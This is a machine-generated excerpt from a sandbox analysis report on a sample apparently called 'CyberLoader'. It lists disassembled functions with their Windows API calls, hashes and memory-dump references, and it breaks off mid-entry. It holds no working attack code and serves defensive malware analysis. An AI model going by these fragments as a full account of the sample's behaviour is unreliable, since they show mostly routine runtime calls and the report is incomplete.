                                                  • Opcode Fuzzy Hash: 4f83e4effc53155d1a8f52a20d6091c1a5483489ad08b615fc1a61987d4f9904
                                                  • Instruction Fuzzy Hash: 7A3107312183169BDF248F14DC4876ABBA8EB81710F04891DF849DB581CB71DD98CBB3
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027A207 Relevance: 4.6, APIs: 3, Instructions: 56COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateDirectoryW.KERNELBASE(?,00000000,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A22E
                                                  • CreateDirectoryW.KERNEL32(?,00000000,?,?,00000800,?,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A261
                                                  • GetLastError.KERNEL32(?,?,?,?,0027A113,?,00000001,00000000,?,?), ref: 0027A27E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CreateDirectory$ErrorLast
                                                  • String ID:
                                                  • API String ID: 2485089472-0
                                                  • Opcode ID: 263918c5a65d776bac9067d9366d62e159734b496e03343bad7ff36d15c24769
                                                  • Instruction ID: cf19dda1ad3e4375a0865476abf41c2cde9a68df6c8d2db1cb15380bca654bd6
                                                  • Opcode Fuzzy Hash: 263918c5a65d776bac9067d9366d62e159734b496e03343bad7ff36d15c24769
                                                  • Instruction Fuzzy Hash: 8601D231170216A6DB32AF745C09BED3348AF47761F04C451FD0DE5092CB72CAA08AA7
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029AFF4 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 132COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • GetCPInfo.KERNEL32(5EFC4D8B,?,00000005,?,00000000), ref: 0029B019
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Info
                                                  • String ID:
                                                  • API String ID: 1807457897-3916222277
                                                  • Opcode ID: ba07fdb6e3c19475fccd43e50b7741ca818c5ccbd28ed3178493cacff999fc9a
                                                  • Instruction ID: bdb4c54b5a097cef2f27b977b94ac312902098f9376c54536c2d36066085ae0d
                                                  • Opcode Fuzzy Hash: ba07fdb6e3c19475fccd43e50b7741ca818c5ccbd28ed3178493cacff999fc9a
                                                  • Instruction Fuzzy Hash: 7C4135B051438C9BDF228E249D94BFBBBA9EB45704F1404ECE59E87142D335AA65CF20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A72C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47COMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • LCMapStringW.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,?,3FE85006,00000001,?,?), ref: 0029A79D
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: String
                                                  • String ID: LCMapStringEx
                                                  • API String ID: 2568140703-3893581201
                                                  • Opcode ID: b6de7351cea88fa307315c5335a3a347167d15ea997e6e5cc7a4068e899668c5
                                                  • Instruction ID: 9801af465c51652b72932d808438717bf1277cc9aeb2c55fe9f96ad03b44e019
                                                  • Opcode Fuzzy Hash: b6de7351cea88fa307315c5335a3a347167d15ea997e6e5cc7a4068e899668c5
                                                  • Instruction Fuzzy Hash: 4101E53255520DFBCF02AFA4DC06DEE7F66EF09750F064154FE1425160CA728931EB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A6CA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 34COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • InitializeCriticalSectionAndSpinCount.KERNEL32(?,?,00299D2F), ref: 0029A715
                                                  Strings
                                                  • InitializeCriticalSectionEx, xrefs: 0029A6E5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CountCriticalInitializeSectionSpin
                                                  • String ID: InitializeCriticalSectionEx
                                                  • API String ID: 2593887523-3084827643
                                                  • Opcode ID: 8d5c500c40c52aae79ab31225adbb233feec56d518ef73a5320f6a6ce8697710
                                                  • Instruction ID: d007d8c800324904879e1606a84b34e6a501109b32ae95afd603e7d882efee5c
                                                  • Opcode Fuzzy Hash: 8d5c500c40c52aae79ab31225adbb233feec56d518ef73a5320f6a6ce8697710
                                                  • Instruction Fuzzy Hash: B9F09A31665218BBCF01AF60DC0ACAEBF65EF06B60B018054FC091A260DE718E20AB95
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A56F Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 30memoryCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: Alloc
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2773662609-671089009
                                                  • Opcode ID: bf7f8e4a30168238945f23c2b97252bde282e8bd153b51735179cdf512df0087
                                                  • Instruction ID: 8630fd00f918a86f7941d35c9f8dc699d49559d02204570cc299a417a1aaa9b4
                                                  • Opcode Fuzzy Hash: bf7f8e4a30168238945f23c2b97252bde282e8bd153b51735179cdf512df0087
                                                  • Instruction Fuzzy Hash: 94E05570B663286B8A10AF60AC0A9AEBB54CF57B10B424099FC0517240CEB04E219ADA
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029329A Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 22COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • try_get_function.LIBVCRUNTIME ref: 002932AF
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: try_get_function
                                                  • String ID: FlsAlloc
                                                  • API String ID: 2742660187-671089009
                                                  • Opcode ID: feecd7543a9bb92813d5a9184ac546b7dd716349ea37e4c4a09984709c3b5447
                                                  • Instruction ID: 31d90c0f7942d3074e57a4669c216afaaf0fd6547cf93bc4fc3093a5a87435b2
                                                  • Opcode Fuzzy Hash: feecd7543a9bb92813d5a9184ac546b7dd716349ea37e4c4a09984709c3b5447
                                                  • Instruction Fuzzy Hash: 8BD02B22B917346BC91036D06C039AF7E088703FF1F450152FE0C1A1838CA549300AC5
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0028E1F9 Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 10COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • ___delayLoadHelper2@8.DELAYIMP ref: 0028E20B
                                                    • Part of subcall function 0028DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 0028DFD6
                                                    • Part of subcall function 0028DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 0028DFE7
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                                  • String ID: 3To
                                                  • API String ID: 1269201914-245939750
                                                  • Opcode ID: 3027b617a06441ccced1244281dda020233af806d48775e33aa60b66854909a6
                                                  • Instruction ID: d3138c6385dfbad4b398c0bb27df454ebc13fb87c9fcdea174963473dd9b6099
                                                  • Opcode Fuzzy Hash: 3027b617a06441ccced1244281dda020233af806d48775e33aa60b66854909a6
                                                  • Instruction Fuzzy Hash: 37B012A927F001BD320C31017F06C36032CC4E2B52330801FF605D40C5D9804C3D9532
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029B350 Relevance: 3.2, APIs: 2, Instructions: 168COMMON
                                                  Download Yara Rule
                                                  APIs
                                                    • Part of subcall function 0029AF1B: GetOEMCP.KERNEL32(00000000,?,?,0029B1A5,?), ref: 0029AF46
                                                  • IsValidCodePage.KERNEL32(-00000030,00000000,?,?,?,?,0029B1EA,?,00000000), ref: 0029B3C4
                                                  • GetCPInfo.KERNEL32(00000000,0029B1EA,?,?,?,0029B1EA,?,00000000), ref: 0029B3D7
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CodeInfoPageValid
                                                  • String ID:
                                                  • API String ID: 546120528-0
                                                  • Opcode ID: 50c4b2e1b2f0e31635c122606e31c16edcd3ae0bcbdd3de411ce4349599fcf36
                                                  • Instruction ID: 7d8c006be36c2262c2650a39d0fb9b16fcdb4ceedf7b0f0646ea4f7d0593b5d8
                                                  • Opcode Fuzzy Hash: 50c4b2e1b2f0e31635c122606e31c16edcd3ae0bcbdd3de411ce4349599fcf36
                                                  • Instruction Fuzzy Hash: 87517770D203069FDF22CF31E9A06BABBE4EF41300F18806ED0968B253D7359952EB80
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00271385 Relevance: 3.1, APIs: 2, Instructions: 97COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00276057: __EH_prolog.LIBCMT ref: 0027605C
                                                    • Part of subcall function 0027C827: __EH_prolog.LIBCMT ref: 0027C82C
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C86F
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C893
                                                  • new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: dea6b790ca78f783ffbe4592c5a9ff67dba45ac91aa0536aaff094ddf7cc9257
                                                  • Instruction ID: 509eaaca7d769c48b1d6bdcc6a62650ec39d9e1282bd908238c0b42098d9e48c
                                                  • Opcode Fuzzy Hash: dea6b790ca78f783ffbe4592c5a9ff67dba45ac91aa0536aaff094ddf7cc9257
                                                  • Instruction Fuzzy Hash: 964102B0815B409EE724DF7984859E6FBE5FF18300F508A6ED6EE83282DB726564CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00271380 Relevance: 3.1, APIs: 2, Instructions: 95COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • __EH_prolog.LIBCMT ref: 00271385
                                                    • Part of subcall function 00276057: __EH_prolog.LIBCMT ref: 0027605C
                                                    • Part of subcall function 0027C827: __EH_prolog.LIBCMT ref: 0027C82C
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C86F
                                                    • Part of subcall function 0027C827: new.LIBCMT ref: 0027C893
                                                  • new.LIBCMT ref: 002713FE
                                                    • Part of subcall function 0027B07D: __EH_prolog.LIBCMT ref: 0027B082
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: H_prolog
                                                  • String ID:
                                                  • API String ID: 3519838083-0
                                                  • Opcode ID: 5aa319418334bdca51346d10695ff9eca1dda22ecf1326091910ecac6c7ce70f
                                                  • Instruction ID: 75cb8c1d5be98c3c42be3019ee3bef61ec9bbc8a9a9ce71b32f289a8b3828724
                                                  • Opcode Fuzzy Hash: 5aa319418334bdca51346d10695ff9eca1dda22ecf1326091910ecac6c7ce70f
                                                  • Instruction Fuzzy Hash: 2B4114B0815B409EE724DF7984859E7FBE5FF18310F504A6ED6EE83282DB326564CB11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0027971E Relevance: 3.1, APIs: 2, Instructions: 86fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • CreateFileW.KERNELBASE(?,00000000,00000001,00000000,00000002,00000000,00000000,?,00000000,?,?,?,00279EDC,?,?,00277867), ref: 002797A6
                                                  • CreateFileW.KERNEL32(?,00000000,00000001,00000000,00000002,00000000,00000000,?,?,00000800,?,?,00279EDC,?,?,00277867), ref: 002797DB
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: CreateFile
                                                  • String ID:
                                                  • API String ID: 823142352-0
                                                  • Opcode ID: fb78790e47114b63bf1cd2a097d317cd517db2ecc19121810345b323bf470c15
                                                  • Instruction ID: c45e362b1e3bb94dfa600e0dc35f4b1ffe77cbf39d0f4c90f706627bf4019a38
                                                  • Opcode Fuzzy Hash: fb78790e47114b63bf1cd2a097d317cd517db2ecc19121810345b323bf470c15
                                                  • Instruction Fuzzy Hash: 362128B0420745AFD7348F64CC86BA7B7E8EB49764F00891DF1D9821D1C374AC948B20
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279D62 Relevance: 3.1, APIs: 2, Instructions: 82timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FlushFileBuffers.KERNEL32(?,?,?,?,?,?,00277547,?,?,?,?), ref: 00279D7C
                                                  • SetFileTime.KERNELBASE(?,?,?,?), ref: 00279E2C
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: File$BuffersFlushTime
                                                  • String ID:
                                                  • API String ID: 1392018926-0
                                                  • Opcode ID: 961456b948b2f4664511967824531157590acf29b56f3e1d39830b3517d60712
                                                  • Instruction ID: 0f7242dcd17c2f054ddee41678c84700562a9409530f141a0c5afd3a62f0f69c
                                                  • Opcode Fuzzy Hash: 961456b948b2f4664511967824531157590acf29b56f3e1d39830b3517d60712
                                                  • Instruction Fuzzy Hash: 8821F631168386AFC720EF24C492EABBBE4AF52708F04881CB8C483141D739EA5CCB51
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 0029A458 Relevance: 3.1, APIs: 2, Instructions: 65libraryloaderCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
                                                  • GetProcAddress.KERNEL32(00000000,?), ref: 0029A4B8
                                                  • __crt_fast_encode_pointer.LIBVCRUNTIME ref: 0029A4C5
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: AddressProc__crt_fast_encode_pointer
                                                  • String ID:
                                                  • API String ID: 2279764990-0
                                                  • Opcode ID: 430f14d08fb8878a930dc7c3e2356947091aee9cbe0721974593132185b3a74a
                                                  • Instruction ID: 0917515d13a607b300b95b8c18f767bdb8c4ee7d08e8f3e9220704c76b95616b
                                                  • Opcode Fuzzy Hash: 430f14d08fb8878a930dc7c3e2356947091aee9cbe0721974593132185b3a74a
                                                  • Instruction Fuzzy Hash: 71112C33A313215B9F25DE2CFC4885A7395AB8172071B4120FD15EB244DB70DC61C7D2
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279B59 Relevance: 3.1, APIs: 2, Instructions: 57COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,?,?,?,-00001964,?,00000800,-00001964,00279B35,?,?,00000000,?,?,00278D9C,?), ref: 00279BC0
                                                  • GetLastError.KERNEL32 ref: 00279BCD
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: 409a60f8be982ac8fd40d2b42acd3d92336dbd947b7895917325d5395f4c7846
                                                  • Instruction ID: a019e37b44b57e5d5f1653bb45d511617b3211bb5dccd8df19310212961d78cf
                                                  • Opcode Fuzzy Hash: 409a60f8be982ac8fd40d2b42acd3d92336dbd947b7895917325d5395f4c7846
                                                  • Instruction Fuzzy Hash: 220104323343069F8B08CE29BC8497EB399EFC1325B10D62DF81A83280CB71DC959B21
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00279E40 Relevance: 3.1, APIs: 2, Instructions: 54COMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • SetFilePointer.KERNELBASE(?,00000000,00000000,00000001), ref: 00279E76
                                                  • GetLastError.KERNEL32 ref: 00279E82
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.1642789736.0000000000271000.00000020.00000001.01000000.00000007.sdmp, Offset: 00270000, based on PE: true
                                                  • Associated: 00000003.00000002.1642762885.0000000000270000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642828077.00000000002A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002AE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002B4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642855936.00000000002D1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                  • Associated: 00000003.00000002.1642946091.00000000002D2000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_270000_CyberLoader.jbxd
                                                  Similarity
                                                  • API ID: ErrorFileLastPointer
                                                  • String ID:
                                                  • API String ID: 2976181284-0
                                                  • Opcode ID: a8773e50762c1b705ad951e5968203228e93b09fb54f4fe355a92a2a482def09
                                                  • Instruction ID: a7095cfe1aca6e9f598651e37e1ab0cdca1d32da304d9d45debce713898d3019
                                                  • Opcode Fuzzy Hash: a8773e50762c1b705ad951e5968203228e93b09fb54f4fe355a92a2a482def09
                                                  • Instruction Fuzzy Hash: 2C019E717243015FEB34DE29DC88B6BB6D99B89324F14893EF14AC2690DA71EC988B11
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Function 00298606 Relevance: 3.0, APIs: 2, Instructions: 44memoryCOMMONLIBRARYCODE
                                                  Download Yara Rule
                                                  APIs
